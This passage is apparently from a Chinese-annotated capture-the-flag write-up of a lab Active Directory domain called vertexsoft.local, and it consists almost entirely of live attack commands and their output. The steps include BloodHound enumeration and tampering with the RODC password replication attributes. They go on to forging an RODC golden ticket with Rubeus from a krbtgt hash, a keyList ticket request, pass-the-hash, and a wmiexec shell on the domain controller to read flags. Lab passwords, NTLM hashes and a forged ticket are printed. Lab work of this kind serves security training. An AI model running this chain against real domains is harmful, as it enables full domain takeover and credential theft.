  File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/cli_modules/set.py", line 126, in password
    ldap = await conn.getLdap()
           ^^^^^^^^^^^^^^^^^^^^
  File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/config.py", line 154, in getLdap
    self._ldap = await Ldap.create(self)
                 ^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 211, in create
    raise e
  File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 199, in create
    raise err
badldap.commons.exceptions.LDAPBindException: invalidCredentials — Reason:(SEC_E_LOGON_DENIED) The logon attempt failed.

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12  -u IsabellaTech -p 'Nt5w0V4?Ff'   -M change-password -o NEWPASS=Admin123
SMB         192.168.8.12    445    RODC             [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.8.12    445    RODC             [-] vertexsoft.local\IsabellaTech:Nt5w0V4?Ff STATUS_PASSWORD_EXPIRED
CHANGE-P... 192.168.8.12    445    RODC             [-] SMB-SAMR password change failed: SAMR SessionError: code: 0xc0020017 - RPC_NT_SERVER_UNAVAILABLE - The RPC server is unavailable.
┌──(root㉿kali)-[~]
└─# rdesktop 192.168.8.12 -u CharlieCloud -p 'u!6vDaGQOA' -d vertexsoft.local -r disk:share=/root/Desktop/ChunQiu/Vertex
Autoselecting keyboard map 'en-us' from locale
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.

进来是本地管理员
Pasted image 20260122233036.png
这里可以用redesktop改密码

 mmmmmm      mmmm    mmmmm        mmmm  
 ##""""##   ##""##   ##"""##    ##""""# 
 ##    ##  ##    ##  ##    ##  ##"      
 #######   ##    ##  ##    ##  ##       
 ##  "##m  ##    ##  ##    ##  ##m      
 ##    ##   ##mm##   ##mmm##    ##mmmm# 
 ""    """   """"    """""        """"  


flag{13dff5f0-370d-420f-a111-189675d7b157}

9. flag08 192.168.8.12

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# nxc smb 192.168.8.12 -u CharlieCloud -p 'Admin123'
SMB         192.168.8.12    445    RODC             [*] Windows Server 2022 Build 20348 x64 (name:RODC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.8.12    445    RODC             [+] vertexsoft.local\CharlieCloud:Admin123 (Pwn3d!)

9.1. Bloodhound

┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# rusthound-ce  -u CharlieCloud -p Admin123 -d vertexsoft.local -c All --zip
---------------------------------------------------
Initializing RustHound-CE at 10:32:38 on 01/22/26
Powered by @g0h4n_0
---------------------------------------------------

[2026-01-22T15:32:38Z INFO  rusthound_ce] Verbosity level: Info
[2026-01-22T15:32:38Z INFO  rusthound_ce] Collection method: All
[2026-01-22T15:32:38Z INFO  rusthound_ce::ldap] Connected to VERTEXSOFT.LOCAL Active Directory!
[2026-01-22T15:32:38Z INFO  rusthound_ce::ldap] Starting data collection...
[2026-01-22T15:32:38Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:39Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=vertexsoft,DC=local
[2026-01-22T15:32:39Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:41Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=vertexsoft,DC=local
[2026-01-22T15:32:41Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:42Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=vertexsoft,DC=local
[2026-01-22T15:32:42Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:42Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=vertexsoft,DC=local
[2026-01-22T15:32:42Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-22T15:32:43Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=vertexsoft,DC=local
[2026-01-22T15:32:43Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2026-01-22T15:32:43Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
[2026-01-22T15:32:43Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] 131 users parsed!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] 61 groups parsed!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] 4 computers parsed!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] 1 ous parsed!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] 1 domains parsed!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] 77 containers parsed!
[2026-01-22T15:32:43Z INFO  rusthound_ce::json::maker::common] .//20260122103243_vertexsoft-local_rusthound-ce.zip created!

RustHound-CE Enumeration Completed at 10:32:43 on 01/22/26! Happy Graphing!

Pasted image 20260123002006.png

9.2. RODC Golden tickets

Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity "RODC$" -Set @{'msDS-RevealOnDemandGroup'='CN=Administrator,CN=Users,DC=VERTEXSOFT,DC=LOCAL'}

PS C:\Users\CharlieCloud\Desktop> Get-DomainObject -Identity "RODC$" -Properties msDS-RevealOnDemandGroup

msds-revealondemandgroup
------------------------
CN=Administrator,CN=Users,DC=vertexsoft,DC=local

PS C:\Users\CharlieCloud\Desktop> Get-ADComputer RODC -Properties msDS-KrbTgtLink


DistinguishedName : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
DNSHostName       : RODC.vertexsoft.local
Enabled           : True
msDS-KrbTgtLink   : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Name              : RODC
ObjectClass       : computer
ObjectGUID        : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
SamAccountName    : RODC$
SID               : S-1-5-21-1670446094-1720415002-1380520873-1106
UserPrincipalName :


RID  : 00000453 (1107)
User : krbtgt_4156
LM   :
NTLM : 34e335179246ef930dc33fd1e3de6e9e
RID  : 00000453 (1107)
User : krbtgt_4156
LM   :
NTLM : 34e335179246ef930dc33fd1e3de6e9e


PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:Administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873 /nowrap /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : VERTEXSOFT.LOCAL (VERTEXSOFT)
[*] SID            : S-1-5-21-1670446094-1720415002-1380520873
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : 34E335179246EF930DC33FD1E3DE6E9E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 34E335179246EF930DC33FD1E3DE6E9E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : vertexsoft.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@vertexsoft.local'

[*] AuthTime       : 1/23/2026 12:22:32 AM
[*] StartTime      : 1/23/2026 12:22:32 AM
[*] EndTime        : 1/23/2026 10:22:32 AM
[*] RenewTill      : 1/30/2026 12:22:32 AM

[*] base64(ticket.kirbi):

      doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELj/Dfb0TodSF0yyX9MPR0NvU586Wc9KOTcQT9Dr37Gr2Uq2d7f+/P00b9gd/TbrsIY/Yo1s6gRsJjllwrVn9PIep9DzPUL/R591KA7uGpEa4g8KEOhpDxm+IbGNljuVOJN96D+jLKYUwoWbFsNEHtbe8KKbmPbv/fWLt6bZllKY9tAJP/D2GFrdcpQ7jfnz94wTR34t7l/O/gPVOMbYL3HwBsCdyYG5pybt9wcIxlneK7QlsvOt3KccEDwJ7BeaOZde+kaITGTYavgSpscgcTAj6aOPkHZrdwkWUyYhpeew4tMyR34jQI3x2KY2dFWo7oOW2DrozCrAkSURGQQ2+PRrjecMMlD1CKuRCZHTLl91l0INPuH5sq/Rzl/V0pwII6BW5DO46WxlykpwgC6EPyN6k6GwvxaevO8byC+8FEzMdQVMN5mu6i4biXPLcaj/W6Y/lIF92ALoUdVNulxIpYRmyN7G/6JYId+VLqXZUm93tUI6oZULzO1i/TW7NV1I12ki3sb5B2QgLqRDf0Wgq2DWtD2w/L8myTNtciiA69LVSatFdou/h6caQilmzDHC1lDKZX+3c35ILOTDov6ShAXAtflZ1OVHa06Bqhkqh0PdVn5O4C84zSI+A4DfgZ0xKO5YqpSjGh/fnzZAa67VdY/vimsHSgOE0IxBxWGYt/z9pC8Hdq5dvPK7TemEQldUx/1fOELFQW9/6Ar6H/TYP/s/j7zv6g2Rikdz/PWKKF3CO8ScjYRmkBiveA/m/BIqAirOHuvUM4o1TEcBWpivAkNaSOsTMaEb5eMhRvliaVzHyHyzrBmZkVsdJqIkUyBRgoM7HlHkbBbwCv1VTxmru3Q66Eou37opp/mqffaLrXp1eFEGYII8Uh7ynbiV6LmigVldnkTb72vE5nf4obZLSRO5Oww5WyPqLpxQ5AgaLawfSpMVaIODx5iSbSxNEc0TuV12kshDP1E/JcK4OvBIFhLglhvYMpYYACY28vU40b2n9su5txyy3m+tRfN6Lkm87O+WUObfrCxC1qmMCOz8fVWNLIStXnjWldjMBWaUf9eftVxfsEMqwGwZ8KGCZH+gtDOyHHZ5+l62LB1MCfrjtF54yD4f+kNblJ9cKqkkejWNeQ+JOKJCXFcfsQIGD/dZm2iiIOzYHQaQ55ynfaNJFglloSdamBHuv+IB6yq+RkW/AoYSN6gnJlzQbJhfmReuUgs1mJrCnEu/G6PNJ7vb4ZMmwc5WCI4pYRtfs9QynN/dK54Rn+cz/5jsRlI/3N3eP55nRa9qffX7SPGMEErnLTrRbIvt31LsyBGKBdeGDXTrgG8/eezUAnSTUrjOkje75n36L2f6tJM0lsVQ4lEn6l2sJkE619mwfKOkNFCISxdQppDxE/eOrSF/3Biqzje8JT531GFwsxnrHMrccMBgZo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQefDz41yXMIVr5ty8aWYTLKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2MjIzMlqlERgPMjAyNjAxMjIxNjIyMzJaphEYDzIwMjYwMTIzMDIyMjMyWqcRGA8yMDI2MDEyOTE2MjIzMlqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==


[+] Ticket successfully imported!

获取一下

PS C:\Users\CharlieCloud\Desktop> nltest /dsgetdc:vertexsoft.local /writable
           DC: \\DC.vertexsoft.local
      Address: \\192.168.1.11
     Dom Guid: 73f6ee42-1629-410f-91b3-06ee3e06dedc
     Dom Name: vertexsoft.local
  Forest Name: vertexsoft.local
 Dc Site Name: Default-First-Site-Name
Our Site Name: Default-First-Site-Name
        Flags: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9 DS_10 KEYLIST
The command completed successfully
Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket:doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELj/Dfb0TodSF0yyX9MPR0NvU586Wc9KOTcQT9Dr37Gr2Uq2d7f+/P00b9gd/TbrsIY/Yo1s6gRsJjllwrVn9PIep9DzPUL/R591KA7uGpEa4g8KEOhpDxm+IbGNljuVOJN96D+jLKYUwoWbFsNEHtbe8KKbmPbv/fWLt6bZllKY9tAJP/D2GFrdcpQ7jfnz94wTR34t7l/O/gPVOMbYL3HwBsCdyYG5pybt9wcIxlneK7QlsvOt3KccEDwJ7BeaOZde+kaITGTYavgSpscgcTAj6aOPkHZrdwkWUyYhpeew4tMyR34jQI3x2KY2dFWo7oOW2DrozCrAkSURGQQ2+PRrjecMMlD1CKuRCZHTLl91l0INPuH5sq/Rzl/V0pwII6BW5DO46WxlykpwgC6EPyN6k6GwvxaevO8byC+8FEzMdQVMN5mu6i4biXPLcaj/W6Y/lIF92ALoUdVNulxIpYRmyN7G/6JYId+VLqXZUm93tUI6oZULzO1i/TW7NV1I12ki3sb5B2QgLqRDf0Wgq2DWtD2w/L8myTNtciiA69LVSatFdou/h6caQilmzDHC1lDKZX+3c35ILOTDov6ShAXAtflZ1OVHa06Bqhkqh0PdVn5O4C84zSI+A4DfgZ0xKO5YqpSjGh/fnzZAa67VdY/vimsHSgOE0IxBxWGYt/z9pC8Hdq5dvPK7TemEQldUx/1fOELFQW9/6Ar6H/TYP/s/j7zv6g2Rikdz/PWKKF3CO8ScjYRmkBiveA/m/BIqAirOHuvUM4o1TEcBWpivAkNaSOsTMaEb5eMhRvliaVzHyHyzrBmZkVsdJqIkUyBRgoM7HlHkbBbwCv1VTxmru3Q66Eou37opp/mqffaLrXp1eFEGYII8Uh7ynbiV6LmigVldnkTb72vE5nf4obZLSRO5Oww5WyPqLpxQ5AgaLawfSpMVaIODx5iSbSxNEc0TuV12kshDP1E/JcK4OvBIFhLglhvYMpYYACY28vU40b2n9su5txyy3m+tRfN6Lkm87O+WUObfrCxC1qmMCOz8fVWNLIStXnjWldjMBWaUf9eftVxfsEMqwGwZ8KGCZH+gtDOyHHZ5+l62LB1MCfrjtF54yD4f+kNblJ9cKqkkejWNeQ+JOKJCXFcfsQIGD/dZm2iiIOzYHQaQ55ynfaNJFglloSdamBHuv+IB6yq+RkW/AoYSN6gnJlzQbJhfmReuUgs1mJrCnEu/G6PNJ7vb4ZMmwc5WCI4pYRtfs9QynN/dK54Rn+cz/5jsRlI/3N3eP55nRa9qffX7SPGMEErnLTrRbIvt31LsyBGKBdeGDXTrgG8/eezUAnSTUrjOkje75n36L2f6tJM0lsVQ4lEn6l2sJkE619mwfKOkNFCISxdQppDxE/eOrSF/3Biqzje8JT531GFwsxnrHMrccMBgZo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQefDz41yXMIVr5ty8aWYTLKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2MjIzMlqlERgPMjAyNjAxMjIxNjIyMzJaphEYDzIwMjYwMTIzMDIyMjMyWqcRGA8yMDI2MDEyOTE2MjIzMlqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==
┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# echo "doIFpjCCBaKgAwIBBaEDAgEWooIElzCCBJNhggSPMIIEi6ADAgEFoRIbEFZFUlRFWFNPRlQuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEHZlcnRleHNvZnQubG9jYWyjggRHMIIEQ6ADAgEXoQYCBBA8AACiggQyBIIELj/Dfb0TodSF0yyX9MPR0NvU586Wc9KOTcQT9Dr37Gr2Uq2d7f+/P00b9gd/TbrsIY/Yo1s6gRsJjllwrVn9PIep9DzPUL/R591KA7uGpEa4g8KEOhpDxm+IbGNljuVOJN96D+jLKYUwoWbFsNEHtbe8KKbmPbv/fWLt6bZllKY9tAJP/D2GFrdcpQ7jfnz94wTR34t7l/O/gPVOMbYL3HwBsCdyYG5pybt9wcIxlneK7QlsvOt3KccEDwJ7BeaOZde+kaITGTYavgSpscgcTAj6aOPkHZrdwkWUyYhpeew4tMyR34jQI3x2KY2dFWo7oOW2DrozCrAkSURGQQ2+PRrjecMMlD1CKuRCZHTLl91l0INPuH5sq/Rzl/V0pwII6BW5DO46WxlykpwgC6EPyN6k6GwvxaevO8byC+8FEzMdQVMN5mu6i4biXPLcaj/W6Y/lIF92ALoUdVNulxIpYRmyN7G/6JYId+VLqXZUm93tUI6oZULzO1i/TW7NV1I12ki3sb5B2QgLqRDf0Wgq2DWtD2w/L8myTNtciiA69LVSatFdou/h6caQilmzDHC1lDKZX+3c35ILOTDov6ShAXAtflZ1OVHa06Bqhkqh0PdVn5O4C84zSI+A4DfgZ0xKO5YqpSjGh/fnzZAa67VdY/vimsHSgOE0IxBxWGYt/z9pC8Hdq5dvPK7TemEQldUx/1fOELFQW9/6Ar6H/TYP/s/j7zv6g2Rikdz/PWKKF3CO8ScjYRmkBiveA/m/BIqAirOHuvUM4o1TEcBWpivAkNaSOsTMaEb5eMhRvliaVzHyHyzrBmZkVsdJqIkUyBRgoM7HlHkbBbwCv1VTxmru3Q66Eou37opp/mqffaLrXp1eFEGYII8Uh7ynbiV6LmigVldnkTb72vE5nf4obZLSRO5Oww5WyPqLpxQ5AgaLawfSpMVaIODx5iSbSxNEc0TuV12kshDP1E/JcK4OvBIFhLglhvYMpYYACY28vU40b2n9su5txyy3m+tRfN6Lkm87O+WUObfrCxC1qmMCOz8fVWNLIStXnjWldjMBWaUf9eftVxfsEMqwGwZ8KGCZH+gtDOyHHZ5+l62LB1MCfrjtF54yD4f+kNblJ9cKqkkejWNeQ+JOKJCXFcfsQIGD/dZm2iiIOzYHQaQ55ynfaNJFglloSdamBHuv+IB6yq+RkW/AoYSN6gnJlzQbJhfmReuUgs1mJrCnEu/G6PNJ7vb4ZMmwc5WCI4pYRtfs9QynN/dK54Rn+cz/5jsRlI/3N3eP55nRa9qffX7SPGMEErnLTrRbIvt31LsyBGKBdeGDXTrgG8/eezUAnSTUrjOkje75n36L2f6tJM0lsVQ4lEn6l2sJkE619mwfKOkNFCISxdQppDxE/eOrSF/3Biqzje8JT531GFwsxnrHMrccMBgZo4H6MIH3oAMCAQCige8Egex9gekwgeaggeMwgeAwgd2gGzAZoAMCARehEgQQefDz41yXMIVr5ty8aWYTLKESGxBWRVJURVhTT0ZULkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQOAAAKQRGA8yMDI2MDEyMjE2MjIzMlqlERgPMjAyNjAxMjIxNjIyMzJaphEYDzIwMjYwMTIzMDIyMjMyWqcRGA8yMDI2MDEyOTE2MjIzMlqoEhsQVkVSVEVYU09GVC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQdmVydGV4c29mdC5sb2NhbA==" | base64 -d > admin.kirbi

┌──(root㉿kali)-[~/…/ChunQiu/Vertex/CodeSentinel/vertexsoftbackup]
└─# nxc smb 192.168.1.11 -u administrator -H EBC447441306783742EE3DF769051B75
SMB         192.168.1.11    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:vertexsoft.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.1.11    445    DC               [+] vertexsoft.local\administrator:EBC447441306783742EE3DF769051B75 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/ChunQiu/Vertex]
└─# impacket-wmiexec 'vertexsoft.local/administrator@192.168.1.11' -hashes :EBC447441306783742EE3DF769051B75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users
C:\users>cd administrator
C:\users\administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is DE1E-1DFE

 Directory of C:\users\administrator

01/23/2026  12:40 AM    <DIR>          .
07/11/2024  08:42 PM    <DIR>          ..
07/11/2024  08:42 PM    <DIR>          3D Objects
07/11/2024  08:42 PM    <DIR>          Contacts
07/17/2024  12:42 PM    <DIR>          Desktop
07/11/2024  08:42 PM    <DIR>          Documents
07/11/2024  08:42 PM    <DIR>          Downloads
07/11/2024  08:42 PM    <DIR>          Favorites
07/17/2024  01:45 PM    <DIR>          flag
07/11/2024  08:42 PM    <DIR>          Links
07/11/2024  08:42 PM    <DIR>          Music
07/11/2024  08:42 PM    <DIR>          Pictures
07/11/2024  08:42 PM    <DIR>          Saved Games
07/11/2024  08:42 PM    <DIR>          Searches
07/11/2024  08:42 PM    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  27,860,480,000 bytes free

C:\users\administrator>cd flag
type flaC:\users\administrator\flag>type flag.txt
flag{81c860d4-5da1-40d6-bdba-33dc58b3c035}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Properties 'msDS-RevealOnDemandGroup' | Select-Object -ExpandProperty 'msDS-RevealOnDemandGroup'
CN=Administrator,CN=Users,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Set @{'msDS-RevealOnDemandGroup'=@(
>>     'CN=Administrator,CN=Users,DC=vertexsoft,DC=local'
>> )}
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Properties 'msDS-NeverRevealGroup' | Select-Object -ExpandProperty 'msDS-NeverRevealGroup'
CN=Denied RODC Password Replication Group,CN=Users,DC=vertexsoft,DC=local
CN=Account Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Server Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Backup Operators,CN=Builtin,DC=vertexsoft,DC=local
CN=Administrators,CN=Builtin,DC=vertexsoft,DC=local
PS C:\Users\CharlieCloud\Desktop> Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Clear 'msDS-NeverRevealGroup'
PS C:\Users\CharlieCloud\Desktop> Get-DomainObject -Identity RODC$


logoncount                               : 23
msds-krbtgtlink                          : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
iscriticalsystemobject                   : True
useraccountcontrol                       : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION, PARTIAL_SECRETS_ACCOUNT
distinguishedname                        : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
objectclass                              : {top, person, organizationalPerson, user...}
displayname                              : RODC$
lastlogontimestamp                       : 1/22/2026 7:28:56 PM
name                                     : RODC
operatingsystemversion                   : 10.0 (20348)
usncreated                               : 49201
msds-authenticatedatdc                   : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
samaccountname                           : RODC$
localpolicyflags                         : 0
codepage                                 : 0
samaccounttype                           : MACHINE_ACCOUNT
msds-revealedusers                       : {B:96:A000090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE395320000000000009532000000000
                                           000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local, B:96:7D00090001000000726BA01C03000000FEF7B65AFA
                                           50694187DFAFC8D205DFE396320000000000009632000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=loc
                                           al, B:96:5E00090001000000726BA01C03000000FEF7B65AFA50694187DFAFC8D205DFE395320000000000009532000000
                                           000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local, B:96:5A00090001000000726BA01C03000000FEF7B65
                                           AFA50694187DFAFC8D205DFE395320000000000009532000000000000:CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=
                                           local...}
accountexpires                           : NEVER
countrycode                              : 0
whenchanged                              : 1/22/2026 4:43:28 PM
instancetype                             : 4
msdfsr-computerreferencebl               : CN=RODC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=vertexsoft,DC=local
objectguid                               : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
operatingsystem                          : Windows Server 2022 Datacenter
lastlogon                                : 1/22/2026 7:29:11 PM
msds-revealeddsas                        : {CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local, CN=RODC,OU=Domain
                                           Controllers,DC=vertexsoft,DC=local, CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local,
                                           CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local...}
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}
objectcategory                           : CN=Computer,CN=Schema,CN=Configuration,DC=vertexsoft,DC=local
dscorepropagationdata                    : {7/17/2024 4:45:07 AM, 7/11/2024 1:16:42 PM, 7/11/2024 1:13:22 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname                     : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/RODC.vertexsoft.local, HOST/RODC/VERTEXSOFT,
                                           HOST/RODC.vertexsoft.local/VERTEXSOFT, GC/RODC.vertexsoft.local/vertexsoft.local...}
serverreferencebl                        : CN=RODC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vertexsoft,DC=local
whencreated                              : 7/11/2024 1:13:22 PM
badpasswordtime                          : 1/22/2026 7:28:56 PM
badpwdcount                              : 0
managedby                                : CN=CharlieCloud,CN=Users,DC=vertexsoft,DC=local
cn                                       : RODC
msds-revealondemandgroup                 : CN=Administrator,CN=Users,DC=vertexsoft,DC=local
objectsid                                : S-1-5-21-1670446094-1720415002-1380520873-1106
primarygroupid                           : 521
msds-authenticatedtoaccountlist          : {CN=CharlieCloud,CN=Users,DC=vertexsoft,DC=local, CN=RODC,OU=Domain
                                           Controllers,DC=vertexsoft,DC=local, CN=WIN-CORP16,CN=Computers,DC=vertexsoft,DC=local,
                                           CN=WIN-CORP36-1,CN=Computers,DC=vertexsoft,DC=local...}
pwdlastset                               : 1/22/2026 7:28:56 PM
msds-supportedencryptiontypes            : 28
usnchanged                               : 49861
lastlogoff                               : 1/1/1601 8:00:00 AM
dnshostname                              : RODC.vertexsoft.local



PS C:\Users\CharlieCloud\Desktop> Get-ADComputer RODC -Properties msDS-KrbTgtLink


DistinguishedName : CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local
DNSHostName       : RODC.vertexsoft.local
Enabled           : True
msDS-KrbTgtLink   : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Name              : RODC
ObjectClass       : computer
ObjectGUID        : e8a6323d-bf5c-438c-b6bd-5eb00b0250fa
SamAccountName    : RODC$
SID               : S-1-5-21-1670446094-1720415002-1380520873-1106
UserPrincipalName :



PS C:\Users\CharlieCloud\Desktop> Get-ADUser krbtgt_4156 -Properties msDS-SecondaryKrbTgtNumber,msDS-KrbTGTLinkBl


DistinguishedName          : CN=krbtgt_4156,CN=Users,DC=vertexsoft,DC=local
Enabled                    : False
GivenName                  :
msDS-KrbTGTLinkBl          : {CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local}
msDS-SecondaryKrbTgtNumber : 4156
Name                       : krbtgt_4156
ObjectClass                : user
ObjectGUID                 : f72de4ed-84c3-4b2d-b6d0-05d55795b8cf
SamAccountName             : krbtgt_4156
SID                        : S-1-5-21-1670446094-1720415002-1380520873-1107
Surname                    :
UserPrincipalName          :



PS C:\Users\CharlieCloud\Desktop> .\Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:Administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873 /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : VERTEXSOFT.LOCAL (VERTEXSOFT)
[*] SID            : S-1-5-21-1670446094-1720415002-1380520873
[*] UserId         : 500
